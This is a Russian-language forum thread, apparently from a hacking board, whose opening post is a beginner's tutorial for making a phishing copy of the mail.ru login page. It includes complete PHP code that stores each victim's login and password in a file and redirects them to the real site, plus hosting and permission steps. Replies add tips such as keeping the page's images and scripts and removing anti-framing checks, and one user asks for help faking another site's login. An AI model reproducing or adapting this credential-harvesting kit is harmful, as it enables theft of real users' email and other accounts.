Делаем фейк на mail.ru

Делаем фейк на mail.ru
Посмотрел несколько тем про фейки на разные сайты и увидел что их продают за 50, 70 рублей и очюмел. Вот и решел написать мини-статью о содании фейках. Буду обьяснять для тех, кто в PHP и HTML не разбирается. И так, для примера нашего фейка возьму одну из самый популярных почтовую систему http://mail.ru, нам надо сделать поддельную страницу авторизации...Я буду работать через свой любимый браузер Mozilla ForeFox, ну что, как говориться - поехалииии!!! Сначала скопируем в браузер ссылку http://win.mail.ru/cgi-bin/login, если все сделали правильно, то перед вами должна открыться страница авторизации на mail.ru. Далее жмем вид - исходный текст страницы (Ctrl+U). Перед вами открылась страница с непонятными буквами и цифрами, если это так, то вы делаете все правильно...теперь надо нажать правка - выделить все (Ctrl+A), потом опять нажимаем правка, и так копировать (Ctrl+C), Теперь открываем блокнот, и там нажимаем вставить (Ctrl+V). Так, давайте продолжим создание. Теперь основная часть фейка, надо изменить в тексте несколько скрочек, так как текс большой, и искать их будет очень долго, то для этого будем использовать поиск по тексту, нажав Ctrl+F. Сразу напишу, кто с текстом работает плохо, то пусть использует комбинацию Ctrl+H (замена текста), а я предпочитаю так и многие пользователи обычным выделением/копипоранием/вставлением, еле написал. Нажимаем Ctrl+F и ищем следующий текст:

Code:

<form method="post" action="auth" onSubmit="return CheckForm(this);">

этот текст надо поменять на вот этот код:

Code:

<form method="post" action="mail.php" onSubmit="return CheckForm(this);">.

Этим мы с помощью будующей страницы будем сохранять данные. Так, чють не забыл, находим есче вот эту строки

Code:

<input type="hidden" name="page" value="">
<input type="hidden" name="post" value="">
<input type="hidden" name="login_from" value="">

их надо удалить. И теперь нажимаем Файл - Сохранить как (Ctrl+Shift+S) и сохраняем файл с именем index.php. Фуф, основную страницу фейка мы сделали. Теперь надо создать страницу, с помощью которой, данные которые вводит жертва, сохранились нам на хост. Опять открываем блокнот и копируем куда вот этот тект:

Code:

<?PHP
$Login = $_POST['Login'];Логин от E-mail'a
$Domain = $_POST['Domain'];//Домен (mail, inbox, list, bk)
$Pass = $_POST['Password'];//Пароль от E-mail'a
$c = "$Login@$Domain:$Pass";
$fp = fopen("file","a+"); //открыть файл
fwrite($fp,"\n $c <br> \n");//записываем вс` данные
fclose($fp); //закрываем
header("Location: http://win.mail.ru/cgi-bin/login"); //куда перенавравиться пользователь после ввода данных
echo "<META HTTP-EQUIV=\"Refresh\" content =\"0; URL=http://win.mail.ru/cgi-bin/start?1390370218\">"
?>

И сохраняем этот файл как mail.php нажав Ctrl+Shift+S.
Теперь надо опять-же открыть блокнот, и нажать сохранить как с именем file. Писать там ничего не надо. Все фейк готов, осталось только залить все (3-файла) на хостинг. Я буду приводить пример на бесплатном хостинге http://ho.com.ua. Регистрируем аккуант, думаю проблем не возникнет, за тем заходим в панель управления хостингом, нажимаем на кнопку на которой написано "Управление файлами" и откроется новое окно - Файловый менеджер (У кого есть FTP, то используйте его, я пользуюсь FileZilla FTP Client). Заходим в папку htdocs и удаляем от туда все файлы, потом закачайте все файлы котороые мы только что создали! И наконец последнее что вам осталось сделать это поставить режим доступа на все файлы 754, кроме файла file.txt, на него поставить права 777, его оставляем как есть. Ну и все, фейк готов. Как впарить фейк жертве, это соверщенно другая тема. Учите СИ и вперед. Удачи, все вопросы писать тут. И кстати, таким способом можно написать фейк с любого сайта.

Copyright ©2008

 

Хоть статья и неважная, но застарания +

ps:Лучше бы ты сделал фейк paypal.com. Посмотрим что бы у тебя вышло?

 

+1 , какая то херня

ps : есть теги

Code:

 [php] и тп , ацкий красный шрифт ебет глаза

 

кому надо научатся сами. а вот так по шаблону делать не понимая сути это сакс((

 

да и кстати если ссылки на css . картинки и тп локальные то по вышеуказанной статье на выходе у нас будет херня а не фейк

 

Поставил СОDE, на популярных сайтах css редкость, во всяком случаи по популярных почтовых системах

 

типа пошутил ?

 

на том же майл ру

Code:

<link href="http://img.mail.ru/mail/ru/css/mail-splash3.css?0" rel="stylesheet" type="text/css" />

по твоему что это ? там правда полный путь и в фейке не поменяет ничего

а вот допусти ВК

Code:

<link rel="stylesheet" href="css/rustyle.css" type="text/css" />

локальная ссылка и если не поменять в фейке будет хренотень

 

Эта статья вроде с хакера стянута

 

видел по фейкам статьи намного лучше видел и видео по фейкам в котором объясняли что зачем и почему

 

гы... чел имел ввиду XSS )))))

 

поделись ссылками раз видел)))

 

ну такое же чудо можно сотворить не только с авторизацией, а еще и с таким приколом типа "вам пришло секретное письмо". только это уже езженые переезженые способы...

 

http://forum.antichat.ru/showpost.php?p=1336830&postcount=3

 

Тут не состыковка какая то происходит во всяком случае мне так кажется... хотя я могу очень глубоко ошибаться так,что не судите строго....по поводу вот этого скрипта в описание темы.....тут описывается вот такая часть скрипта,а точнее вот начало скрипта который первоначальный.... <form method="post" action="auth" onSubmit="return CheckForm(this);"> как описывает автор нужно заменить на
<form method="post" action="mail.php" onSubmit="return CheckForm(this);">. а на самом деле в первоначальном исходнике до изменения тут очевидно видно,что там совсем form method="post" action="http://win.mail.ru/cgi-bin/auth" name="Auth" onSubmit="return CheckForm(this);">

Или если заменить на этот скрипт даже если первоначальный он даже не такой,то значения не имеет??????...люди обьясните если я рассуждаю не так...поправьте меня пожалуйста.

ИЗВЕНИТЕ ЕСЛИ Я НЕСУ КАКОЙ-ТО БРЕД!!!

 

vlad_tsepesh
Не имеет, неважно что там написано в поле Экшен, главное заменить на локальный обработчик формы и сохранить данные.

Файл - Сохранить Как - HTML файл с изображениями. И получим все скрипты JS, картинки.

 

А сама система палит его как в контакте??? например?!,а то может и зря придется с ним возиться

 

Ты имееш ввиду Это? :

В фейке это можно вырезать, это расчитано для Ифреймов как я понял, хотя невникал, видел на парочке сайтов.

 

Почти...но немного в том смысле,что когда переходишь на фейковую страницу которая якобы авторизации контакта,а он выдает такое...в смысле контакт:

Вот такое примерно...вот я и подумал,а вдруг не стоит заморачиваться?! ...вдруг так же и там???

 

С mail.ru вроде все понятно и не так сложно, но мне нужен фейк на https://www.raggame.ru/login.asp, пытался отталкиваячь от данной статьи написать, что естественно не увенчалось успехом, для начала исходный код страницы копируется без оформления, и выглядит ужасно в браузере, функцию описанную в 17 посте, не нашел ни в одном из имеющихся у меня текстовых редакторов, дальше больше, какая строка "моего" кода отвечает за подобную операцию ? ( <form method="post" action="mail.php" onSubmit="return CheckForm(this);">. ) Я так понял что эта (thisForm.login_action.value=1;
thisForm.submit(); ) хотя я уверен на 80% что это не так, потом код отвечающих за сохранение данных, у меня будет такой же или другой. Помогите пожалуйста новичку, решил изучать html начиная сразу с практики